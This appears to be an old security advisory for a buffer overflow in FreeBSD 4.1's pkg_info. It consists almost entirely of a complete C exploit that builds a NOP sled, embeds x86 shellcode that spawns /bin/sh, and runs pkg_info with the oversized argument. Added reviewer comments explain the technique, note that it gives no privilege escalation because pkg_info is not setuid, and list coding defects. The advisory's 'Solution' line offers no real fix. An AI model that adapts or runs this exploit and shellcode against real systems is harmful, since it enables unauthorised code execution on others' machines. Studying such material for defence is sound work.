|
Vulnerability pkginfo Affected FreeBSD 4.1 Description 'visi0n' posted following.
/*
 * FreeBSD 4.1 x86 pkg_info exploit.
 * anthrax# ./AUX-pkg_info 4301 2000
 * Author: visi0n.
 * AUX TECHNOLOGIES BRASIL.
 * Comments: This is for fun, because pkg_info isnt suid.
 *
 * Reviewer notes (documentation only; code left exactly as posted):
 *  - Because pkg_info is not setuid, the shell spawned by this program runs
 *    with the invoking user's own privileges: what is demonstrated is a
 *    buffer overflow in pkg_info's argument handling, not a privilege
 *    escalation.  The exact overflowed buffer in pkg_info is not shown here;
 *    presumably a fixed-size stack buffer receives argv without a length
 *    check — confirm against the pkg_info source of that release.
 *  - The argument built in main() (a buffer of repeated stack addresses, a
 *    run of NOPs, then a payload) is the textbook stack-smash layout.  Stack
 *    protectors, non-executable stacks and address-space randomisation in
 *    later systems are the generic mitigations for this bug class; a
 *    bounds-checked copy in pkg_info is the actual fix.
 *  - <stdlib.h> and <unistd.h> are not included, so atoi(), malloc() and
 *    execl() are implicitly declared (C89 behaviour; an error under modern
 *    compilers).
 */
#include <stdio.h>
#include <string.h>

#define OFFSET 0          /* default distance subtracted from the sampled %esp */
#define BUFFER_SIZE 4301  /* default argument length; overridable via argv[1]  */
#define NOP 0x90          /* x86 single-byte no-op used for the landing pad    */

/* Payload bytes as posted; the trailing "/bin/sh.-c.sh" is the command string. */
char shellcode[]=
"\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x36\x89\x76"
"\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x46\x08\x1b"
"\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x50\x56\xff"
"\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff"
"\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02"
"\x02\x02\x02/bin/sh.-c.sh";

/*
 * Return the caller's current stack pointer.
 *
 * There is no return statement: the value comes back only because the inline
 * asm leaves %esp in %eax, the register the i386 ABI uses for integer
 * returns.  Falling off the end of a non-void function is undefined
 * behaviour in C, so this works by compiler accident, not by contract.
 */
unsigned long get_esp() { __asm__("movl %esp,%eax"); }

/*
 * Build an oversized argument and exec pkg_info with it.
 *
 * argv[1] (optional) - total argument length in bytes, default BUFFER_SIZE.
 * argv[2] (optional) - offset subtracted from the sampled %esp, default OFFSET.
 *
 * Notes: `void main` is non-standard; atoi() does no error reporting, so a
 * non-numeric argument silently becomes 0; the malloc() result is used
 * without a NULL check.
 */
void main(int argc, char *argv[]) {
    char *buff, *ptr;
    long *addr_ptr, addr;
    int offset = OFFSET, bsize = BUFFER_SIZE;
    int i;

    if (argc > 1) bsize = atoi(argv[1]);
    if (argc > 2) offset = atoi(argv[2]);

    buff = malloc(bsize);                 /* unchecked allocation */

    /* Guessed return address: the sampled stack pointer minus the offset. */
    addr = get_esp() - offset;
    printf("0x%x\n", addr);               /* %x with a long: %lx is the matching specifier */

    /* Fill the entire buffer with the guessed address, one long per step.
     * If bsize is not a multiple of 4 the final store writes up to three
     * bytes past the end of the allocation. */
    ptr = buff;
    addr_ptr = (long *)ptr;
    for (i = 0; i < bsize; i += 4) *(addr_ptr++) = addr;

    /* First half of the buffer becomes a run of NOPs. */
    for (i = 0; i < bsize/2; i++) buff[i] = NOP;

    /* Place the payload centred on the buffer midpoint.  strlen(shellcode)
     * is re-evaluated on every iteration of the copy loop. */
    ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
    for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i];

    buff[bsize -1] = '\0';                /* NUL-terminate so it passes as a C string */
    printf("%d\n", strlen(buff));         /* %d with a size_t: %zu is the matching specifier */

    /* The argument list is terminated with a bare 0; the portable sentinel is
     * (char *)NULL.  It happens to work where int and pointer are the same
     * width, as on i386. */
    execl("/usr/sbin/pkg_info", "pkg_info", buff, 0);
}
Solution It should be fixed.